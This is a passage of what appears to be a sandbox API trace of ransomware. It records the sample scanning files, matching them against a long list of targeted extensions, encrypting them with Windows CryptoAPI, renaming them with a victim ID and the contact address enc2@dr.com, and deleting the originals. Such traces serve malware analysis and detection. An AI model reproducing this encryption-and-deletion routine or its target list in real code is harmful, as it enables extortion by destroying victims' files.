5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.051] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.051] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.052] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.052] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x159d, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x159d, lpOverlapped=0x0) returned 1
	[0172.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.058] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcba18) returned 1
	[0172.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.060] CryptCreateHash (in: hProv=0xfcba18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.060] CryptHashData (hHash=0xfb9bf0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.060] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.061] CryptDeriveKey (in: hProv=0xfcba18, Algid=0x6610, hBaseData=0xfb9bf0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb8f30) returned 1
	[0172.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.061] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x159d, dwBufLen=0x159d | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x15a0) returned 1
	[0172.061] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.061] RtlMoveMemory (in: Destination=0xfdf730, Source=0xfde188, Length=0x159d | out: Destination=0xfdf730) 
	[0172.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.062] CryptEncrypt (in: hKey=0xfb8f30, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdf730*, pdwDataLen=0x18a1ec*=0x159d, dwBufLen=0x15a0 | out: pbData=0xfdf730*, pdwDataLen=0x18a1ec*=0x15a0) returned 1
	[0172.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.063] CryptDestroyKey (hKey=0xfb8f30) returned 1
	[0172.063] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.063] CryptDestroyHash (hHash=0xfb9bf0) returned 1
	[0172.063] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.063] CryptReleaseContext (hProv=0xfcba18, dwFlags=0x0) returned 1
	[0172.063] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.064] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.064] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.064] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.066] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 141
	[0172.066] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.067] WriteFile (in: hFile=0x39c, lpBuffer=0xfdf730*, nNumberOfBytesToWrite=0x15a0, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdf730*, lpNumberOfBytesWritten=0x18a648*=0x15a0, lpOverlapped=0x0) returned 1
	[0172.070] CloseHandle (hObject=0x39c) returned 1
	[0172.072] CloseHandle (hObject=0x390) returned 1
	[0172.072] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml")) returned 1
	[0172.076] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\customizations.xml")) returned 0
	[0172.076] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1430407, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1430407, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1430407, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1
	[0172.076] lstrcmpW (lpString1="MasterDatastore.xml", lpString2="..") returned 1
	[0172.077] lstrcmpW (lpString1="MasterDatastore.xml", lpString2=".") returned 1
	[0172.077] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\"
	[0172.077] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\", lpString2="MasterDatastore.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml"
	[0172.077] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml") returned 100
	[0172.077] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0172.077] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\MasterDatastore.xml", cchLength=0x64 | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml") returned 0x64
	[0172.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0172.078] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml") returned="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"
	[0172.078] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml") returned 100
	[0172.078] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.078] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.079] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0172.079] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0172.079] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0172.079] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0172.079] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0172.080] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0172.080] ReadFile (in: hFile=0x390, lpBuffer=0xfdcd58, nNumberOfBytesToRead=0x10f, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdcd58*, lpNumberOfBytesRead=0x18a640*=0x10f, lpOverlapped=0x0) returned 1
	[0172.083] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.084] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0172.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.086] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0172.086] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.087] CryptHashData (hHash=0xfb95b0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0172.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.087] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb95b0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb90b0) returned 1
	[0172.087] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.088] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x10f, dwBufLen=0x10f | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x110) returned 1
	[0172.088] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.089] RtlMoveMemory (in: Destination=0xfdc6a8, Source=0xfdcd58, Length=0x10f | out: Destination=0xfdc6a8) 
	[0172.089] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.089] CryptEncrypt (in: hKey=0xfb90b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x10f, dwBufLen=0x110 | out: pbData=0xfdc6a8*, pdwDataLen=0x18a1ec*=0x110) returned 1
	[0172.089] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.090] CryptDestroyKey (hKey=0xfb90b0) returned 1
	[0172.090] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.090] CryptDestroyHash (hHash=0xfb95b0) returned 1
	[0172.090] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.090] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0172.090] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0172.091] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0172.091] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0172.091] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0172.093] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 142
	[0172.093] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0172.093] WriteFile (in: hFile=0x39c, lpBuffer=0xfdc6a8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfdc6a8*, lpNumberOfBytesWritten=0x18a648*=0x110, lpOverlapped=0x0) returned 1
	[0172.096] CloseHandle (hObject=0x39c) returned 1
	[0172.097] CloseHandle (hObject=0x390) returned 1
	[0172.097] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml")) returned 1
	[0172.100] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml" (normalized: "c:\\users\\all users\\microsoft\\provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}\\masterdatastore.xml")) returned 0
	[0172.101] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 1
	[0172.101] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd9177d6, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd9177d6, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd9177d6, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Prov", cAlternateFileName="")) returned 0
	[0172.101] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0172.101] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0172.102] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{23cb517f-5073-4e96-a202-7fe6122a2271}"
